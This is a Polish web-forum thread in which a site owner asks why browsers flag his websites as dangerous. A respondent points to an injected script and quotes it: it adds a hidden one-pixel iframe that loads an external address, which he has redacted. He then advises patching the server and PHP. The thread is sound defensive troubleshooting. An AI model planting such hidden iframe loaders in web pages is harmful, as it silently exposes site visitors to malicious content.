ganisz Opublikowano 22 Listopada 2012 Zgłoś Udostępnij Opublikowano 22 Listopada 2012 Witam, na stronach www, które posiadam na swoim serwerze ostatnio zaczałą pojawiać się komunikat o ich szkodliwości i mozliwości dokonywania ataków. Prosiłbym o sugestie co powinienem zrobić aby zdiagnozować i usunąć problem. Zaznaczam, że nie mam możliwości instalowania programów na serwerze. Link do strony: www.brainypixel.pl Odnośnik do komentarza
mgrzeg Opublikowano 22 Listopada 2012 Zgłoś Udostępnij Opublikowano 22 Listopada 2012 Hej, wygląda na to, że padłeś ofiarą jakiegoś automatu i jednak Twoja witryna nie jest bezpieczna. Zwróć uwagę na kod opatrzony komentarzem , który wstawia na Twojej stronie ramkę odwołującą się do zewnętrznego serwisu: (function () { var sh = document.createElement('iframe'); sh.src = 'WYCIAPANY_ADRES_PRZEZ_MGRZEGA'; sh.style.position = 'absolute'; sh.style.border = '0'; sh.style.height = '1px'; sh.style.width = '1px'; sh.style.left = '1px'; sh.style.top = '1px'; if (!document.getElementById('sh')) { document.write(' '); document.getElementById('sh').appendChild(sh); } })(); Nie zaglądałem pod wyciapany adres, ale zakładam, że czai się tam zły kod i raczej nie chcesz go nikomu prezentować i raczej na pewno nie Ty to tam wstawiłeś Sprawdź aktualizację środowiska (jedyne, co widać, to Server: IdeaWebServer/v0.80), jeśli dalej siedzi jakiś PHP, czy cuś, to też połataj. m.g. Odnośnik do komentarza
ganisz Opublikowano 22 Listopada 2012 Autor Zgłoś Udostępnij Opublikowano 22 Listopada 2012 Wyrzuciłem tą linijkę kody. Na innych stronach mam też PHP, na co tutaj powinienem zwrócić uwagę? Tutaj jedna z zainfekowanych witryn na moim serwerze www.kwiaciarniasorella.pl. Odnośnik do komentarza
Rekomendowane odpowiedzi